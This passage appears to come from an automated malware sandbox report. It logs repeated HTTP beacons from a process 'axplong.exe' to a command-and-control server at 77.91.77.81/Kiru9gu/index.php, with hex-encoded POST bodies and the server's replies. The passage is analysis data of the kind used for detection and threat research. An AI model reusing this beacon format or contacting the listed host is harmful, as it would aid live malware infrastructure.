                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:43.286154985 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.44977077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:43.407735109 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:44.145384073 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:44.182696104 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:44.406802893 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.44977177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:44.530352116 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:45.229437113 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:45.230345011 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:45.453689098 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.44977277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:45.576471090 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:46.273478031 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:46.274374008 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:46.498425007 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.44977377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:46.608462095 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:47.324934006 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:47.326010942 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:47.549350977 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.44977477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:47.670804024 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:48.368803978 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:48.369740963 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:48.590985060 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.44977577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:48.882122993 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:49.571902990 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:49.574723959 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:49.793989897 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.44977677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:49.903357983 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:50.592240095 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:50.593245983 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:50.810106039 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.44977777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:50.918145895 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:51.652353048 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:51.653331041 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:51.875099897 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.44977877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:51.997663975 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:52.721287966 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:52.722177029 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:52.950196981 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.44977977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:53.060506105 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:54.853240013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:54.853403091 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:54.853571892 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:54.854770899 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:55.075937986 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.44978077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:55.184998035 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:55.946350098 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:55.949414968 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:56.170958042 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.44978277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:56.294636011 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:57.012132883 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
